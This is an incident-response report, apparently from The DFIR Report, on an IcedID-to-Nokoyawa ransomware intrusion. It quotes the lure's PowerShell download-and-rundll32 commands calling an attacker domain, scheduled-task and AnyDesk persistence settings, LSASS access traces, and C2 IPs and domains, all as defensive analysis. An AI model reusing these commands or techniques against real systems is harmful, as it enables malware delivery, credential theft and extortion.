{
	"id": "b32fc979-3909-4c80-af52-cb2c880c27db",
	"created_at": "2026-04-06T00:07:58.475284Z",
	"updated_at": "2026-04-10T13:12:12.273045Z",
	"deleted_at": null,
	"sha1_hash": "051a69981cfdec4db89081a317572b13207fe85a",
	"title": "From OneNote to RansomNote: An Ice Cold Intrusion",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 8400653,
	"plain_text": "From OneNote to RansomNote: An Ice Cold Intrusion\r\nBy editor\r\nPublished: 2024-04-01 · Archived: 2026-04-05 22:41:32 UTC\r\nKey Takeaways\r\nIn late February 2023, threat actors rode a wave of initial access using Microsoft OneNote files. In this\r\ncase, we observed a threat actor deliver IcedID using this method.\r\nAfter loading IcedID and establishing persistence, there were no further actions, other than beaconing for\r\nover 30 days.\r\nThe threat actor used Cobalt Strike and AnyDesk to target a file server and a backup server.\r\nThe threat actor used FileZilla to exfiltrate data from the network before deploying Nokoyawa\r\nransomware.\r\nAn audio version of this report can be found on Spotify, Apple, YouTube, Audible, \u0026 Amazon.\r\nPlease consider leaving feedback on this report here.\r\nServices\r\nWe provide a range of services, one of which is our Threat Feed, specializing in monitoring Command and\r\nControl frameworks like Cobalt Strike, Metasploit, Sliver, Viper, Mythic, Havoc, Meterpreter, and more. For\r\nexample, the Cobalt Strike server in this case was detected weeks before this intrusion started.\r\nAnother service we provide is Private Threat Briefs, which encompasses over 25 private reports annually. These\r\nreports follow a format similar to our public reports but are more concise in nature. In contrast to our public\r\nreports, these briefs are typically released shortly after an intrusion, sometimes even while the intrusion is still\r\nongoing.\r\nOur comprehensive “All Intel” service includes the Threat Feed, Private Threat Briefs, exploit events, long-term\r\ninfrastructure tracking, clustering, Cobalt Strike configurations, C2 domains, and a curated collection of\r\nintelligence, which includes non-public case data.\r\nOur Private Sigma Ruleset is exclusively curated using insights derived from Private Threat Briefs and internal\r\ncases, focusing on Sigma rules. As of January 2024, it encompasses approximately 100 Sigma rules, created from\r\nthe knowledge of 40+ distinct cases. Each rule is mapped to ATT\u0026CK and accompanied by a test example.\r\nContact us for a demo or free trial today!\r\nTable of Contents:\r\nCase Summary\r\nhttps://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/\r\nPage 1 of 40\n\nAnalysts\r\nInitial Access\r\nExecution\r\nPersistence\r\nPrivilege Escalation\r\nDefense Evasion\r\nCredential Access\r\nDiscovery\r\nLateral Movement\r\nCollection\r\nCommand and Control\r\nExfiltration\r\nImpact\r\nTimeline\r\nDiamond Model\r\nIndicators\r\nDetections\r\nMITRE ATT\u0026CK\r\nCase Summary\r\nThis intrusion started in late February of 2023 and lasted through late March of 2023. The threat actor initially\r\ngained access through a phishing campaign, in which they distributed emails containing malicious OneNote\r\nattachments. During this period, OneNote files had surged in popularity among initial access brokers. This rise\r\nwas primarily due to their capability to circumvent email attachment blocking rules and evade detection by\r\nexisting security mechanisms.\r\nUpon opening the malicious OneNote file and engaging with it, the file triggered the execution of a cmd file. This,\r\nin turn, launched PowerShell to facilitate the download of an IcedID DLL from a remote server. To evade\r\ndetection, this DLL was disguised using various image file extensions. Following the execution of the downloaded\r\nDLL, a scheduled task was established to maintain persistence within the system. Notably, unlike prior IcedID\r\ninfections, no discovery actions were observed at this time.\r\nFor the next 21 days, activity was limited to command and control beaconing with no other actions detected. On\r\nday 22, the standard IcedID discovery, using Microsoft tools like: net, nltest, chcp, and systeminfo, was observed.\r\nBeyond this, no further activity was noted.\r\nOn day 33 of the intrusion, the IcedID malware launched several Cobalt Strike beacons. These beacons, once\r\nactive on the beachhead host, injected into numerous processes and initiated an Active Directory discovery\r\noperation. This operation used a batch script to execute a series of AdFind commands. Next, a PowerShell script\r\nwas deployed to install AnyDesk. Following the installation, another batch script ran to relay the newly generated\r\nAnyDesk ID back to the threat actor.\r\nhttps://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/\r\nPage 2 of 40\n\nThe threat actor then connected to the host using AnyDesk and began browsing files. The account they were\r\nlogged in as had elevated privileges, since the original user, who inadvertently activated the malware, was a\r\nmember of the domain administrators group. Leveraging this access, they accessed LSASS on the host and\r\nproceeded with additional reconnaissance activities. These actions encompassed both command line queries, such\r\nas net, whoami, and route, as well as GUI based tools through the AnyDesk connection, including the use of Task\r\nManager and the deployment of SoftPerfect Network Scanner (aka NetScan).\r\nAfter getting a list of hosts, the threat actor created a batch file to run nslookup for all the identified hosts. While\r\nthat was running, the threat actor browsed file shares, looking at various documents including password related\r\ndocuments. The threat actor then created a second batch script to run nslookup, this time targeting Windows\r\nservers specifically. Shortly after running this, the threat actor initiated their first lateral movement action, using\r\nRDP to connect to a backup server from their beachhead host.\r\nOn the backup server, they used Internet Explorer to download a Cobalt Strike beacon and then they executed it.\r\nUtilizing this beacon, they proceeded to deploy and execute an AnyDesk installer package, identical to the one\r\nobserved on the initial compromised host. Next, they pivoted to a file server and performed the same actions. On\r\nthe file server, they continued to review documents, including insurance related files.\r\nThe threat actor then opened Internet Explorer on the file server and proceeded to download FileZilla. Utilizing\r\nthe FileZilla client, they established a SFTP connection to a remote server, initiating the data exfiltration process.\r\nThis marked the beginning of a prolonged data exfiltration operation that spanned several hours. Apart from the\r\nongoing data transfers, activity significantly decreased until it resumed the following day.\r\nApproximately 18 hours after the initiation of the data exfiltration process, the threat actor deemed the activity\r\ncomplete and progressed to the next phase of their attack. They conducted another network scan utilizing NetScan.\r\nRoughly two and a half hours post-scan, they initiated the preparation for a ransomware delivery. Leveraging their\r\nAnyDesk connection on the file server, they reviewed both the Task Manager and the Local Group Policy\r\nManager, before dropping a ransomware file on the host. Following this, they executed a batch script designed to\r\nlaunch the ransomware.\r\nFollowing the execution of ransomware on the file server, the threat actor re-established their connection to the\r\nbackup server, conducting similar checks via Task Manager and Local Group Policy Manager before dropping the\r\nransomware file. Next, they introduced and executed IOBit’s Unlocker utility, a move likely aimed at\r\ncircumventing file locks imposed by the backup software. After using this tool, they followed the same batch\r\nscript execution on this server as previously observed. After execution, they dropped and ran ProcessHacker and\r\nthen proceeded to open the batch file in notepad++ before re-running the script and ransomware.\r\nApproximately two hours after the initiation of the ransomware on the file server, the threat actor revisited the\r\nsystem through their AnyDesk connection. In this return visit, they uninstalled FileZilla, signaling a move to cover\r\ntheir tracks. Next, they re-executed the ransomware on the host, and then opened the ransom note on the server’s\r\ndesktop, verifying their objective was complete.\r\nFollowing this action, no further activities were detected from the threat actor regarding the ransomware\r\ndeployment, indicating a strategic decision to limit the attack’s scope to these two critical servers rather than\r\nhttps://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/\r\nPage 3 of 40\n\nextending it across the entire network. From initial access to ransomware execution, we observed a Time to\r\nRansomware (TTR) of 812 hours, just over 34 calendar days.\r\nOne interesting thing to note about the command and control domain for Cobalt Strike is it was seized by\r\nMicrosoft, Fortra and Health-ISAC a few weeks after this intrusion. On April 6, 2023, the command and control\r\ndomain changed DNS to Microsoft with a domain registration name of Digital Crimes Unit.\r\nPlease consider leaving feedback on this report here.\r\nAnalysts\r\nAnalysis and reporting completed by @iiamaleks, @IrishD34TH, and @Miixxedup\r\nInitial Access\r\nA widespread malicious email campaign that broadly targeted many companies in unrelated industries blasted\r\ngeneric lures with an attached OneNote file claiming to contain an unspecified “secure message.” The campaign\r\nwas documented in open-source threat intelligence by pr0xylife on their GitHub repository. The campaign ID used\r\nby threat actor was 3329953471, embedded in the configuration data in the IcedID DLL payload.\r\nAccording to Proofpoint Threat Research, the campaign was not very large in message volume compared to other\r\ncampaigns, with fewer than one thousand messages observed over two days, broadly targeting companies across\r\nManufacturing, Technology, Energy, Retail, Insurance, and several other sectors. The threat actor behind the\r\ncampaign used techniques similar to two tracked threat actors but did not provide enough unique attributes to\r\nstrongly attribute the campaign to either one of them.\r\nThe OneNote file used to gain initial access in this case was not very sophisticated. A Windows batch file named\r\n“O p e n.cmd” was hidden behind a large button marked “Open” in the OneNote file with a blurred image of a\r\ndocument in the background and simple instructions in the foreground to double click the button.\r\nhttps://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/\r\nPage 4 of 40\n\nExecution\r\nThe initial execution through the OneNote lure required the person who received the email attachment to open the\r\nOneNote file. After clicking through the warning prompt, the O p e n.cmd file executed PowerShell to download\r\nan IcedID DLL named as if it was a JPG file, then used rundll32 to execute the DLL, which immediately\r\nconnected to command and control servers, checked in and started beaconing over unencrypted HTTP, triggering\r\nan Emerging Threats Open rule: ET MALWARE Win32/IcedID Request Cookie.\r\nThe earliest indicators that something suspicious occurred were the Sysmon events: File Created (Event ID 11)\r\nand File Stream Created (Event ID 15) that showed a .cmd file with the Mark of the Web was created by OneNote:\r\nhttps://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/\r\nPage 5 of 40\n\nThe metadata of the O p e n.cmd batch file can be found on VirusTotal, and the contents are shown below. It is a\r\nvery simple batch script that uses basic obfuscation, but yet presents some easy detection opportunities in its\r\nbehavior:\r\nAfter de-obfuscating the batch file (or by observing the child processes created during dynamic analysis), the\r\npurpose of the script becomes clear. \r\npowershell invoke-webrequest -uri http://mrassociattes.com/images/62.gif -outfile c:\\programdata\\COIm\r\nIt uses PowerShell to download a payload file from a URL. The remote server request makes it look like it could\r\nbe a GIF image that is being downloaded. The file is dropped to C:\\programdata\\ using a filename that looks like a\r\nJPEG image. The real filetype is actually a DLL:\r\nThe file was then run using rundll32.\r\nrundll32 c:\\programdata\\COIm.jpg,init\r\nSomewhat surprisingly, more than a month after initial access in the intrusion, after the threat actor had started\r\ninteracting with the compromised machine using AnyDesk, they opened the OneNote file and double-clicked the\r\nOpen button to launch IcedID again. We are unsure of the motivation of this action, but this represented another\r\nchance for defenders to respond if detections were in place.\r\nhttps://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/\r\nPage 6 of 40\n\nExecution of Cobalt Strike Beacon\r\nOn the 33rd day of the intrusion, the IcedID malware was observed dropping several files.\r\nThese files were Cobalt Strike beacons, which were then executed via the IcedID malware. IcedID was running in\r\nrundll32.exe, which launched a DLL version of Cobalt Strike beacon from the user’s AppData\\Local\\Temp\r\ndirectory using regsvr32.exe. The IcedID rundll32.exe process also launched an EXE version of a beacon named\r\n“Funa2.exe” from the same Temp directory.\r\nDuring lateral movement activity, the threat actors deployed the same executable Cobalt Strike beacon as seen on\r\nthe beachhead host. This time, they used the name csrss.exe and executed these using the RDP session. The files\r\nwere downloaded onto the lateral hosts using Internet Explorer, then executed by clicking directly from the\r\nInternet Explorer download prompt or by double-clicking in File Explorer window.\r\nThroughout the later stages of the intrusion the Cobalt Strike beacons used various named pipes.\r\nhttps://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/\r\nPage 7 of 40\n\nOne of the many effective ways to detect Cobalt Strike beacon in this intrusion was through the named pipes it\r\ncreated, which used the default naming patterns. These pipe creation events were observed with Sysmon.\r\nA DLL version of the Cobalt Strike beacon was dropped on the beachhead host in the Local AppData Temp\r\ndirectory and executed with RegSvr32.exe, but that process did not create any named pipes.\r\nThe default Cobalt Strike pipes are (the “*” symbolize the prefix/suffix):\r\n\\postex_*\r\n\\postex_ssh_*\r\n\\status_*\r\n\\msagent_*\r\n\\MSSE-*\r\n\\*-server\r\nMore strategies for detecting Cobalt Strike can be found in Cobalt Strike, a Defender’s Guide part 1 and part 2. \r\nPersistence\r\nDuring the initial execution of IcedID, the following two files were created under the AppData Roaming folder of\r\nthe user that executed it:\r\nCadiak.dll: IcedID first stage.\r\nlicense.dat: Encoded version of the second stage, which gets loaded into memory by the first stage.\r\nA scheduled task was created that contained instructions for executing the IcedID DLL and the location of the\r\nlicense.dat file. This is a very common method that IcedID uses for persistence.\r\n\u003c?xml version=\"1.0\" encoding=\"UTF-16\"?\u003e\r\n\u003cTask version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\"\u003e\r\n \u003cRegistrationInfo\u003e\r\n \u003cURI\u003e\\azigci_{C747FFDF-F0E2-113B-8DCA-0ECA4EBB92A2}\u003c/URI\u003e\r\n \u003c/RegistrationInfo\u003e\r\n \u003cTriggers\u003e\r\nhttps://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/\r\nPage 8 of 40\n\n\u003cLogonTrigger id=\"LogonTrigger\"\u003e\r\n \u003cEnabled\u003etrue\u003c/Enabled\u003e\r\n \u003cUserId\u003e[REDACTED]\u003c/UserId\u003e\r\n \u003c/LogonTrigger\u003e\r\n \u003c/Triggers\u003e\r\n \u003cPrincipals\u003e\r\n \u003cPrincipal id=\"Author\"\u003e\r\n \u003cRunLevel\u003eHighestAvailable\u003c/RunLevel\u003e\r\n \u003cUserId\u003e[REDACTED]\u003c/UserId\u003e\r\n \u003cLogonType\u003eInteractiveToken\u003c/LogonType\u003e\r\n \u003c/Principal\u003e\r\n \u003c/Principals\u003e\r\n \u003cSettings\u003e\r\n \u003cMultipleInstancesPolicy\u003eIgnoreNew\u003c/MultipleInstancesPolicy\u003e\r\n \u003cDisallowStartIfOnBatteries\u003efalse\u003c/DisallowStartIfOnBatteries\u003e\r\n \u003cStopIfGoingOnBatteries\u003efalse\u003c/StopIfGoingOnBatteries\u003e\r\n \u003cAllowHardTerminate\u003efalse\u003c/AllowHardTerminate\u003e\r\n \u003cStartWhenAvailable\u003etrue\u003c/StartWhenAvailable\u003e\r\n \u003cRunOnlyIfNetworkAvailable\u003efalse\u003c/RunOnlyIfNetworkAvailable\u003e\r\n \u003cIdleSettings\u003e\r\n \u003cDuration\u003ePT10M\u003c/Duration\u003e\r\n \u003cWaitTimeout\u003ePT1H\u003c/WaitTimeout\u003e\r\n \u003cStopOnIdleEnd\u003etrue\u003c/StopOnIdleEnd\u003e\r\n \u003cRestartOnIdle\u003efalse\u003c/RestartOnIdle\u003e\r\n \u003c/IdleSettings\u003e\r\n \u003cAllowStartOnDemand\u003etrue\u003c/AllowStartOnDemand\u003e\r\n \u003cEnabled\u003etrue\u003c/Enabled\u003e\r\n \u003cHidden\u003efalse\u003c/Hidden\u003e\r\n \u003cRunOnlyIfIdle\u003efalse\u003c/RunOnlyIfIdle\u003e\r\n \u003cWakeToRun\u003efalse\u003c/WakeToRun\u003e\r\n \u003cExecutionTimeLimit\u003ePT0S\u003c/ExecutionTimeLimit\u003e\r\n \u003cPriority\u003e7\u003c/Priority\u003e\r\n \u003c/Settings\u003e\r\n \u003cActions Context=\"Author\"\u003e\r\n \u003cExec\u003e\r\n \u003cCommand\u003erundll32.exe\u003c/Command\u003e\r\n \u003cArguments\u003e\"C:\\Users\\[REDACTED]\\AppData\\Roaming\\[REDACTED]\\Cadiak.dll\",init --od=\"DeskBlouse\\li\r\n \u003c/Exec\u003e\r\n \u003c/Actions\u003e\r\n\u003c/Task\u003e\r\nThe scheduled task was configured to execute at logon under the user that initially executed the IcedID payload.\r\nLater in the intrusion, AnyDesk was installed with a command line option that established persistence, running\r\nwhen Windows starts by creating a Service:\r\nhttps://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/\r\nPage 9 of 40\n\nC:\\ProgramData\\AnyDesk.exe --install C:\\ProgramData\\Any --start-with-win --silent\r\nDuring the deployment of AnyDesk, a service creation event was generated under the System channel:\r\nAlerting on every service creation is usually far too noisy for any meaningful review by security operations\r\npersonnel, but it can be very helpful to alert on specific patterns of remote monitoring and management (RMM)\r\ninstallation artifacts. There are many approaches for detecting RMM tools through resilient patterns of file paths\r\nor digital signatures. These legitimate tools may not trigger alerts in endpoint detection products by default, so it is\r\nimportant for security teams to create custom detections. As seen in various previous cases here at The DFIR\r\nReport, and also on other platforms, RMM tools provide a very easy way to get access to systems with interactive\r\ncapabilities.\r\nPrivilege Escalation\r\nThe user account that opened the initial OneNote lure file was in the domain administrators security group.\r\nUsually, threat actors have to work to escalate to a domain admin from an unprivileged user account, but in this\r\ncase, it was a given. This is an example of why it is a best practice for domain administrators to use separate\r\naccounts and a privileged workstation to perform administrative functions, while using a non-privileged user\r\naccount to check email, browse the web, and open files from unknown sources when necessary.\r\nDefense Evasion\r\nMasquerading\r\nhttps://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/\r\nPage 10 of 40\n\nOne of the simpler ways that IcedID attempted to evade detection was by naming the malware DLL file as\r\nCOIm.jpg. Renaming a DLL file extension to a commonly ignored graphics file type, such as jpg, gif, or png, is a\r\nsimple example of Masquerading, MITRE Technique T1036.008, and represents an excellent opportunity for a\r\ncustom detection.\r\nThe threat actor was observed using common Windows process names for other tooling used during the intrusion,\r\nincluding:\r\ncsrss.exe for a Cobalt Strike beacon downloaded from 91.215.85[.]183/download/csrss.exe\r\nsvchost.exe for the ransomware payload deployed to systems.\r\nProcess Injection\r\nUpon execution of a Cobalt Strike beacon, process injection into a svchost.exe process was observed. In this\r\ncase, process injection was conducted by writing into a remote process and executing the code via a remote thread.\r\nsvchost.exe was subsequently observed executing multiple different commands related to discovery and\r\nenumeration.\r\nSince the discovery commands involved executing scripts via cmd.exe , the anomalous parent child relationship\r\nbetween svchost.exe and cmd.exe was observed on the system from a memory dump.\r\nhttps://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/\r\nPage 11 of 40\n\nIndicator Removal\r\nFileZilla, installed by the threat actors for exfiltration activity, was observed being manually uninstalled by the\r\nthreat actors during the final ransomware deployment period.\r\nCredential Access\r\nThe threat actors extracted credentials from LSASS during the intrusion. The process started with a Cobalt Strike\r\nbeacon process starting a new rundll32.exe child process, with no command line arguments, as SYSTEM. It is\r\nunusual for rundll32 to be executed without any command line, but it is a common pattern for Cobalt Strike\r\nbeacon injection target processes. This makes a useful detection pattern. The rundll32 process also created a\r\nnamed pipe (Sysmon Event ID 17) with a pipe name that started with “\\postex_” which is another well-known\r\nCobalt Strike beacon artifact that can be detected. The newly spawned rundll32 process accessed the lsass.exe\r\nprocess, and then created a remote thread in lsass.exe. These events were recorded by Sysmon event IDs 8 and 10.\r\nEvent ID 10 had the following relevant fields, which may be useful for threat hunting or incident response:\r\nProcess accessed:\r\nSourceImage: C:\\Windows\\system32\\rundll32.exe\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+9d1e4|C:\\Windows\\System32\\KERNELBASE.dll+2bcbe|UNKNOWN(00000\r\nTargetUser: NT AUTHORITY\\SYSTEM\r\nEvent ID 8 had the following relevant fields:\r\nCreateRemoteThread detected:\r\nSourceImage: C:\\Windows\\System32\\rundll32.exe\r\nTargetImage: C:\\Windows\\System32\\lsass.exe\r\nhttps://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/\r\nPage 12 of 40\n\nStartModule: -\r\nStartFunction: -\r\nTargetUser: NT AUTHORITY\\SYSTEM\r\nAfter accessing and injecting into LSASS, the threat actors began using another domain administrator account\r\nindicating successful credential access.\r\nDuring file share browsing activity by the threat actors, we observed them finding and opening a document related\r\nto passwords for the environment.\r\nDiscovery\r\nIcedID Discovery\r\nIcedID was observed executing multiple discovery commands originating from rundll32.exe on the beachhead.\r\nWMIC /Node:localhost /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get * /Format:List\r\nipconfig /all\r\nsysteminfo\r\nnet config workstation\r\nnltest /domain_trusts\r\nnltest /domain_trusts /all_trusts\r\nnet view /all /domain\r\nnet view /all\r\nnet group \"Domain Admins\" /domain\r\nThese host profiling commands in this order are typically seen from IcedID bots, and reverse engineering the\r\nIcedID binary shows that they are hard-coded (in encrypted strings) to be run when the bot receives a specific\r\ncommand from its command and control server. A published IcedID analysis report from Binary Defense\r\ndescribes the same commands observed, and a report from Walmart Global Tech details the algorithm to decrypt\r\nthe command strings. In different IcedID samples, the commands may appear in a different order, but all versions\r\ncontain nearly the same list of profiling commands. While alerting on any one of these commands by itself might\r\nresult in too many false-positive alerts for security operations, a useful technique is to set up alerts when more\r\nthan three or four of these commands are seen in a short time period on the same host. If the parent process is\r\nrundll32, regsvr32, or another high-risk process, the severity of the alert may be elevated.\r\nActive Directory Enumeration\r\nAn AD.bat batch script and AdFind.exe were dropped onto the beachhead host from a process injected\r\nsvchost.exe process.\r\nhttps://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/\r\nPage 13 of 40\n\nThe AD.bat script was subsequently executed, which initiated discovery of Active Directory via ADFind.\r\nadfind.exe -gcb -sc trustdmp\r\nadfind.exe -f \"(objectcategory=group)\"\r\nadfind.exe -subnets -f (objectCategory=subnet)\r\nadfind.exe -f (objectcategory=organizationalUnit)\r\nadfind.exe -f objectcategory=computer -csv name operatingSystem\r\nadfind.exe -f objectcategory=computer\r\nadfind.exe -f (objectcategory=person)\r\nC:\\Windows\\system32\\cmd.exe /c dir /s /b C:\\Windows\\system32\\*htable.xsl\r\nNslookup Discovery\r\nAn injected process svchost.exe was observed dropping a ns.bat Batch script.\r\nExecution of ns.bat initiated the execution of nslookup commands that attempted to resolve multiple desktop\r\nand server hostnames.\r\nhttps://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/\r\nPage 14 of 40\n\nLater, a second nsser.bat script was observed executing multiple nslookup commands.\r\nPort Scanning\r\nSoftPerfect Network Scanner was used by the threat actor on multiple different systems under different\r\ndirectories.\r\nNetScan was seen connecting to multiple ports, on multiple different IP addresses–an activity indicative of port\r\nscanning.\r\nhttps://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/\r\nPage 15 of 40\n\nThe following summarizes a list of ports that were scanned using NetScan.\r\nPort Purpose\r\n53 DNS\r\n80 HTTP\r\n88 Kerberos\r\n111 NFS, NIS, or any rpc-based service\r\n135 Remote Procedure Call\r\n137 NetBIOS\r\n161 SNMP\r\n389 LDAP\r\n443 HTTPS\r\n445 SMB\r\n464 Used by the Kerberos authentication system\r\n2049 NFS\r\n3389 RDP\r\n5353 Multicast DNS (mDNS) and DNS-SD\r\nHands on Discovery\r\nDuring RDP sessions the threat actors were also observed opening Task Manager multiple times via the Start\r\nMenu, as indicated by the /7 flag.\r\nhttps://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/\r\nPage 16 of 40\n\nOther commands were observed being executed manually by the threat actors, either from Cobalt Strike beacons\r\nor in Windows cmd shells opened via the interactive AnyDesk or RDP sessions. Commands included:\r\nC:\\Windows\\system32\\cmd.exe /C net group \"domain Admins\" /domain\r\nroute print\r\nwhoami\r\nLateral Movement\r\nRDP was used by the threat actors to move laterally from the beachhead to other servers in the environment. After\r\nconnecting to each server with RDP, the threat actors took steps to deploy a Cobalt Strike beacon, as well as\r\nAnyDesk on the system.\r\nThe Cobalt Strike payload was downloaded from 91.215.85[.]183/download/csrss.exe via Internet Explorer.\r\nThe payload was then launched multiple times from the Downloads folder and also copied and executed from the\r\nWindows temporary folder.\r\nhttps://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/\r\nPage 17 of 40\n\nIn addition, the INSTALL.ps1 script was dropped and executed by the Cobalt Strike beacon.\r\nCollection\r\nWhile the threat actors had spent significant time in the environment, there appeared to be some interest in certain\r\ndocuments. A concrete example is, directly after the threat actors accesses the file server with AnyDesk, they use\r\nnotepad++ to open a file related to the insurance policy of this victim.\r\nOn the beachhead, workstation files were opened with their ‘preferred’ option: Word for .docx, Excel for .xlsx and\r\nInternet Explorer for .pdf.\r\nWhile it is not always easy to get a full list of files a threat actor had specifically accessed, this time it was logged\r\nwell in process activity.\r\nOn other machines, there was apparent interest in certain files, mainly related to possible passwords, PII and other\r\nfinancial data.\r\nCommand and Control\r\nThe threat actors used three different ways to access the hosts within this network:\r\nIcedID\r\nCobalt Strike\r\nAnyDesk\r\nhttps://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/\r\nPage 18 of 40\n\nBelow is an overview of each of the stages found during the intrusion.\r\nIcedID\r\nIcedID uses multiple staged domains to deliver parts of its functionality. The IcedID DLL running in the rundll32\r\nprocess immediately connected to its command and control server on port 80, using domain name\r\naerilaponawki[.]com, which resolved at the time to 193.149.129.131. The contents of this network connection\r\nmatched a malware rule in the free Emerging Threats Open ruleset ET MALWARE Win32/IcedID Request\r\nCookie.\r\nThe IcedID process also connected to two other command and control servers by domain name, but both of these\r\nconnections used TLS over port 443, so it was not possible for the network sensor to observe as much content or\r\nmatch as many network detection rules as it would have with TLS termination or unencrypted traffic. The\r\nconnection to klindriverfor[.]com (5.255.102.167) on port 443 repeated about once every 10 minutes for 12 days.\r\nThe connection to alishaskainz[.]com (45.61.139.206) on port 443 also repeated about once every 10 minutes for\r\n28 days.\r\nBelow table shows an overview and function of each domain:\r\nIP Port Domain Usage ISP Location\r\n193.149.129.131 80 aerilaponawki[.]com\r\nFirst callout\r\nand primary\r\nC2 IcedID\r\nBLNWX NL\r\n5.255.102.167 443 klindriverfor[.]com\r\nAdditional\r\nC2 IcedID\r\nThe\r\nInfrastructure\r\nGroup\r\nNL\r\n45.61.139.206 443 alishaskainz[.]com\r\nAdditional\r\nC2 IcedID\r\nBL Networks\r\nGB\r\nGB\r\n5.255.105.55 443 halicopnow[.]com\r\nAdditonal\r\nC2 IcedID\r\nThe\r\nInfrastructure\r\nGroup\r\nNL\r\nFor each of the domains, an overview of the relevant rules that can be used (in combination) to look for IcedID\r\nbehavior:\r\naerilaponawki[.]com:\r\nET MALWARE Win32/IcedID Request Cookie\r\nklindriverfor[.]com:\r\nET POLICY OpenSSL Demo CA - Internet Widgits Pty (0)\r\nhttps://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/\r\nPage 19 of 40\n\nalishaskainz[.]com:\r\nET POLICY OpenSSL Demo CA - Internet Widgits Pty (0)\r\nhalicopnow[.]com:\r\nET POLICY OpenSSL Demo CA - Internet Widgits Pty (0)\r\nWhen looking for additional strange network connections, we can find these two gathered from a memory dump\r\nof the compromised systems. The connection from rundll32.exe is especially interesting and is related to our\r\nIcedID infection. It appears to be a different IP for one of the previously found command and control domains.\r\nIP Port Domain Usage ISP Location\r\n162.33.178.40 443 alishaskainz[.]com\r\nAdditional C2\r\nIcedID\r\nBL Networks\r\nGB\r\nGB\r\nCobalt Strike\r\nThe Cobalt Strike beacons which were used during the intrusion were named:\r\nagaloz.dll\r\nFuna2.exe / csrss.exe\r\nThey contain a configuration to contact the below command and control server:\r\nIP Domain Usage ISP Location\r\n91.215.85.183 msc-mvc-updates[.]com Cobalt Strike C2 Prospero Ooo RU\r\nSuricata reported hits for ‘Malleable’ profiles used by the Cobalt Strike beacon. These profiles are\r\npreconfigurable and are mostly used to ‘mimic’ known traffic of different applications, such as a\r\nmail client, chat client, or a JavaScript library. The rule that hits, can be seen in the first screenshot\r\nbelow.\r\nhttps://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/\r\nPage 20 of 40\n\nThe second screenshot shows the actual configured portion of the profile, which appears very similar to this\r\n“gmail” profile. Communication goes via the URI:\r\n/_/scs/mail-static/_js/\r\nThe DFIR Report Threat Intel Team picked up this Cobalt Strike server on January 9th, 2023, weeks before the\r\nintrusion. On that day, the beacon profile resembled a freely available malleable C2 profile that mimics jquery.\r\nhttps://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/\r\nPage 21 of 40\n\nThe command and control server appears to have been in use through at least April 2024 with a different Cobalt\r\nStrike beacon reported to the Triage malware sandboxing service using the same gmail-like profile and remote IP\r\nas observed in this intrusion.\r\nhttps://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/\r\nPage 22 of 40\n\nWith that said, it appears Microsoft took over this domain on April 6, 2023 when DNS was switched from\r\nCloudflare to MICROSOFTINTERNETSAFETY.NET and the domain started resolving to 20.69.178.82\r\n(Microsoft).\r\nWe can see the registration information was updated (date showing last updated) as well:\r\nhttps://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/\r\nPage 23 of 40\n\nWe were also able to locate the complaint by Microsoft, Fortra and Health-ISAC to acquire this domain:\r\nHere’s an outtake of the domain and registration information from the complaint.\r\nhttps://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/\r\nPage 24 of 40\n\nAccording to The DFIR Report’s Threat Intel Team, the IP was observed hosting Cobalt Strike through June 3,\r\n2023.\r\nAfter initial deployment, the threat actors downloaded additional beacons, all of which have a parent process of\r\nthe executable called Funa2.exe . It appears that the .dll likely didn’t work as expected, as five minutes later an\r\n.exe with the same name gets downloaded.\r\nDLL download attempt:\r\nhttps://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/\r\nPage 25 of 40\n\nChange to EXE download:\r\nShortly after, we find the first connection to the server using the malleable profile paths:\r\nhttps://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/\r\nPage 26 of 40\n\nAnyDesk\r\nDuring later stages of the intrusion, the threat actors deployed AnyDesk using a PowerShell script copied under\r\nC:\\ProgramData\\INSTALL.ps1 . In addition, the copied PowerShell script was executed on multiple systems to\r\nfacilitate the deployment of AnyDesk using the following commands: \r\n mkdir \"C:\\ProgramData\\Any\"\r\n # Download AnyDesk\r\n $clnt = new-object System.Net.WebClient\r\n $url = \"http://download.anydesk.com/AnyDesk.exe\"\r\n $file = \"C:\\ProgramData\\AnyDesk.exe\"\r\n 